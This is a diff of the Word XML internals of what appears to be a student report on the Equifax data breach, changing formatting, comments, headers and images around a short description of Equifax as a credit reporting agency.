 <w15:commentsEx xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w15:commentEx w15:paraId="1F0B79F5" w15:done="0"/>
   <w15:commentEx w15:paraId="6B299AD7" w15:done="0"/>
   <w15:commentEx w15:paraId="7D33D47A" w15:done="0"/>
 </w15:commentsEx>
@@ -306,10 +622,80 @@
 
 <file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
 <w16cid:commentsIds xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
-  <w16cid:commentId w16cid:paraId="1F0B79F5" w16cid:durableId="1F780DBE"/>
   <w16cid:commentId w16cid:paraId="6B299AD7" w16cid:durableId="1F781072"/>
   <w16cid:commentId w16cid:paraId="7D33D47A" w16cid:durableId="1F781065"/>
 </w16cid:commentsIds>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:p>
+    <w:pPr>
+      <w:pStyle w:val="Header"/>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:sz w:val="24"/>
+      </w:rPr>
+    </w:pPr>
+    <w:r>
+      <w:rPr>
+        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:sz w:val="24"/>
+      </w:rPr>
+      <w:t>Joshua Gould – Equifax Report</w:t>
+    </w:r>
+  </w:p>
+</w:hdr>
 </file>
 
 <file path=word/people.xml><?xml version="1.0" encoding="utf-8"?>
@@ -843,6 +1229,73 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004D5F52"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004D5F52"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00BB1E04"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00BB1E04"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00BB1E04"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00BB1E04"/>
+  </w:style>
 </w:styles>
 </file>
 

--- a/_seniorI/CLINIC/Equifax Data Breach.docx
+++ b/_seniorI/CLINIC/Equifax Data Breach.docx
@@ -4,188 +4,7 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Equifax Incorporate is a credit reporting agency</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> that distributes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> information on 800 million individual consumers </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">along with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>88 million businesses worldwide</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>The incorporate owns</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">massive amounts of data </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>on consumers and possess the ability to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> turn over</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the said data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> anyone who want</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to know credit </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>of certain</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> individuals.</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
+        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="24"/>
@@ -197,26 +16,26 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E588E8E" wp14:editId="7A491745">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48E3A198" wp14:editId="1020703A">
             <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>3427095</wp:posOffset>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>313055</wp:posOffset>
+              <wp:posOffset>1123950</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="2449195" cy="2324100"/>
-            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
+            <wp:extent cx="1314450" cy="1276350"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapTight wrapText="bothSides">
               <wp:wrapPolygon edited="0">
                 <wp:start x="0" y="0"/>
-                <wp:lineTo x="0" y="21423"/>
-                <wp:lineTo x="21505" y="21423"/>
-                <wp:lineTo x="21505" y="0"/>
+                <wp:lineTo x="0" y="21278"/>
+                <wp:lineTo x="21287" y="21278"/>
+                <wp:lineTo x="21287" y="0"/>
                 <wp:lineTo x="0" y="0"/>
               </wp:wrapPolygon>
             </wp:wrapTight>
-            <wp:docPr id="1" name="Picture 1" descr="Image result for “Apache Struts”"/>
+            <wp:docPr id="2" name="Picture 2" descr="Image result for Retail Credit company"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -224,7 +43,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="0" name="Picture 1" descr="Image result for “Apache Struts”"/>
+                    <pic:cNvPr id="0" name="Picture 1" descr="Image result for Retail Credit company"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
@@ -237,13 +56,13 @@
                         </a:ext>
                       </a:extLst>
                     </a:blip>
-                    <a:srcRect l="22436" r="22436"/>
+                    <a:srcRect l="14287" t="10127" r="12697" b="5064"/>
                     <a:stretch/>
                   </pic:blipFill>
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2449195" cy="2324100"/>
+                      <a:ext cx="1314450" cy="1276350"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -261,10 +80,10 @@
                 </pic:pic>
               </a:graphicData>
             </a:graphic>
-            <wp14:sizeRelH relativeFrom="page">
+            <wp14:sizeRelH relativeFrom="margin">
               <wp14:pctWidth>0</wp14:pctWidth>
             </wp14:sizeRelH>
-            <wp14:sizeRelV relativeFrom="page">
+            <wp14:sizeRelV relativeFrom="margin">
               <wp14:pctHeight>0</wp14:pctHeight>
             </wp14:sizeRelV>
           </wp:anchor>
@@ -276,22 +95,457 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>The Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="240" w:line="276" w:lineRule="auto"/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax Incorporate is a credit reporting agency</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that distributes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> information on 800 million individual consumers </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">along with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>88 million businesses worldwide</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The incorporate owns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">massive amounts of data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on consumers and possess the ability to</w:t>
